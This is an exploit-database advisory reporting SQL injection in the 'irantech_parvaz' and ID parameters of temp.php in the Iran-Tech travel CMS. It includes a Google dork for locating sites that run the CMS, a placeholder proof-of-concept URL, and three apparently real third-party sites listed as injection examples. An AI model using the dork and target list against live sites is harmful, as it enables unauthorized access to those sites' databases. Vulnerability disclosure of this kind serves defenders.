Iran-Tech CMS Travel SQL Injection

2020.06.20
ir https://t.me/Iran_bugs_report (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: [intext:"طراحی سایت: ایران تکنولوژی"] && find portfolio from here : http://www.iran-tech.com/portfolio/

#### #Exploit Title : Iran-Tech CMS Travel SQL Injection #Author : Iran_bugs_report #Home page Link : http://www.iran-tech.com #Date : 2020-06-05 #Version: All versions #Google Dork: [intext:"طراحی سایت: ایران تکنولوژی"] && find portfolio from here : http://www.iran-tech.com/portfolio/ #Contact: #CrackSoftwareIrani@gmail.com #OR #CRACKANDHACK@protonmail.com #OR #Channel & Sample Data : #https://t.me/Iran_bugs_report #### // Vulnerability Description: SQL injection vulnerability:- ============================== in file temp.php data from GET parameter 'irantech_parvaz' and 'ID' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability Example : "temp.php?irantech_parvaz=170&id=1" ------------------- POC ------------------- http://127.0.0.1/fa/user/temp.php?irantech_cms=SQL&ID=SQL {Injection_Here} -------------------- POC -------------------- Example for sql injection : http://tariqagency.ir/en/user/temp.php?irantech_parvaz=170&id=1 https://mosafer24.ir/fa/user/temp.php?irantech_parvaz=iranhoteldetail&idhotel=31&idcity=80&level22=15 http://www.sarahotel.org/fa/user/temp.php?irantech_parvaz=contactus


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top